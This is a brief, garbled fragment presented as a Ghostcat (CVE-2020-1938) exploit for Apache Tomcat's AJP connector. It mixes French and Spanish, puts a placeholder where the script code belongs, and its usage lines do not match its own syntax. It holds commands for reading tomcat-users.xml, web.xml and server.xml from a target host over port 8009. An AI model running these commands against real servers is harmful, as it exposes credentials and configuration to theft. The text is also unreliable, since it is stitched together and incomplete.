
CVE-2020-1938 Exploit
Ghostcat - CVE-2020-1938 Exploit Lit les fichiers du Tomcat via le connecteur AJP (port 8009) Utilisation : python3 ghostcat.py <hôte> [fichier] """
cat > ghostcat.py << 'PYEOF' [AQUÍ VA EL CÓDIGO COMPLETO DE ARRIBA] PYEOF
chmod +x ghostcat.py
python3 ghostcat.py exemple.com conf/tomcat-users.xml 8009
python3 ghostcat.py exemple.com WEB-INF/web.xml 8009
python3 ghostcat.py exemple.com conf/server.xml 8009